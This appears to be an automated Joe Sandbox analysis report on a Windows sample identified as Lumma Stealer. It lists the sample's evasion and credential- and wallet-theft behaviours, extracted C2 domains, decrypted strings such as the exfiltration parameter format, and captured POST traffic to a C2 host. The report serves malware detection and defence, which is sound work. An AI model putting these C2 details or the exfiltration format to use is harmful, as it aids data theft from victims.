Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545916
MD5:cec67349e89de3d1bfd88f409f7c0ed2
SHA1:9779ec5b940cbab0acf08548e41400ab9010503f
SHA256:bf4dd45749338c3f9fec76ba69cb27ab2ceb995c54056efa681b07629413bb27
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3084 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CEC67349E89DE3D1BFD88F409F7C0ED2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["navygenerayk.store", "founpiuer.store", "thumbystriw.store", "fadehairucw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 3084JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 3084JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 3084JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:04.044644+010020546531A Network Trojan was detected192.168.2.649709188.114.97.3443TCP
            2024-10-31T10:15:05.153325+010020546531A Network Trojan was detected192.168.2.649710188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:04.044644+010020498361A Network Trojan was detected192.168.2.649709188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:05.153325+010020498121A Network Trojan was detected192.168.2.649710188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:03.526967+010020571241Domain Observed Used for C2 Detected192.168.2.649709188.114.97.3443TCP
            2024-10-31T10:15:04.706146+010020571241Domain Observed Used for C2 Detected192.168.2.649710188.114.97.3443TCP
            2024-10-31T10:15:05.986585+010020571241Domain Observed Used for C2 Detected192.168.2.649711188.114.97.3443TCP
            2024-10-31T10:15:07.254126+010020571241Domain Observed Used for C2 Detected192.168.2.649713188.114.97.3443TCP
            2024-10-31T10:15:08.646851+010020571241Domain Observed Used for C2 Detected192.168.2.649714188.114.97.3443TCP
            2024-10-31T10:15:10.383887+010020571241Domain Observed Used for C2 Detected192.168.2.649715188.114.97.3443TCP
            2024-10-31T10:15:12.728986+010020571241Domain Observed Used for C2 Detected192.168.2.649717188.114.97.3443TCP
            2024-10-31T10:15:14.789864+010020571241Domain Observed Used for C2 Detected192.168.2.649728188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:02.840866+010020571291Domain Observed Used for C2 Detected192.168.2.6626611.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:02.862663+010020571271Domain Observed Used for C2 Detected192.168.2.6498911.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:02.883258+010020571231Domain Observed Used for C2 Detected192.168.2.6553841.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:02.827175+010020571311Domain Observed Used for C2 Detected192.168.2.6646841.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:02.872774+010020571251Domain Observed Used for C2 Detected192.168.2.6497871.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T10:15:10.869280+010020480941Malware Command and Control Activity Detected192.168.2.649715188.114.97.3443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Found malware configuration
            Source: file.exe.3084.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["navygenerayk.store", "founpiuer.store", "thumbystriw.store", "fadehairucw.store", "presticitpo.store", "scriptyprefej.store", "crisiwarny.store", "necklacedmny.store"], "Build id": "4SD0y4--legendaryy"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068D7F8 CryptUnprotectData,0_2_0068D7F8
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49717 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_0068104F
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]0_2_0067E1A0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_006AE210
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+64h]0_2_006A15DC
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_0069F9D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esi+10h], edx0_2_0069F9D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0069F9D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0069F9D0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h]0_2_0069AB20
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h0_2_0069AB20
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_006B4C40
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch]0_2_0067EC20
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, esi0_2_006ABCA9
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah]0_2_0067CF90
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h]0_2_0068E07E
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_0069702F
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]0_2_006AF020
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, dword ptr [esp+1Ch]0_2_006AF020
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h0_2_00671000
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h0_2_00671000
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then add ecx, eax0_2_0069A083
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6Ch]0_2_0069A083
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, ecx0_2_006B2165
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [006BDCFCh]0_2_006AC132
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], B62B8D10h0_2_0069D2FD
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [esp]0_2_0069D2FD
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00698290
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+29352E8Dh]0_2_006B5330
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h0_2_0069C3A6
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, edx0_2_006B24E0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_006814CE
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_006714A8
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+58h]0_2_00692520
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_006B35F0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_006B35F0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_006966E0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax]0_2_006936AC
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_006B3740
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]0_2_006B3740
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0069F73A
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-3ED06EDAh]0_2_006AC7A0
            Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0069E7B0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:49891 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:62661 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:49787 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:55384 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:64684 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49710 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49711 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49715 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49714 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49717 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49728 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49715 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.97.3:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: navygenerayk.store
            Source: Malware configuration extractorURLs: founpiuer.store
            Source: Malware configuration extractorURLs: thumbystriw.store
            Source: Malware configuration extractorURLs: fadehairucw.store
            Source: Malware configuration extractorURLs: presticitpo.store
            Source: Malware configuration extractorURLs: scriptyprefej.store
            Source: Malware configuration extractorURLs: crisiwarny.store
            Source: Malware configuration extractorURLs: necklacedmny.store
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: necklacedmny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: necklacedmny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19968Host: necklacedmny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1219Host: necklacedmny.store
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571023Host: necklacedmny.store
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: presticitpo.store
            Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
            Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
            Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
            Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: file.exe, 00000000.00000002.2238112404.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: file.exe, 00000000.00000003.2167886502.0000000005DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
            Source: file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
            Source: file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: file.exe, 00000000.00000003.2154027869.0000000005DB5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2216337376.000000000175F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197575644.0000000001765000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238112404.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
            Source: file.exe, 00000000.00000003.2154108274.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154027869.0000000005DB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/$$
            Source: file.exe, 00000000.00000003.2141543367.000000000175F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/5
            Source: file.exe, 00000000.00000003.2185780103.0000000001772000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186041761.0000000001772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/99=
            Source: file.exe, 00000000.00000003.2216337376.000000000175F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/D
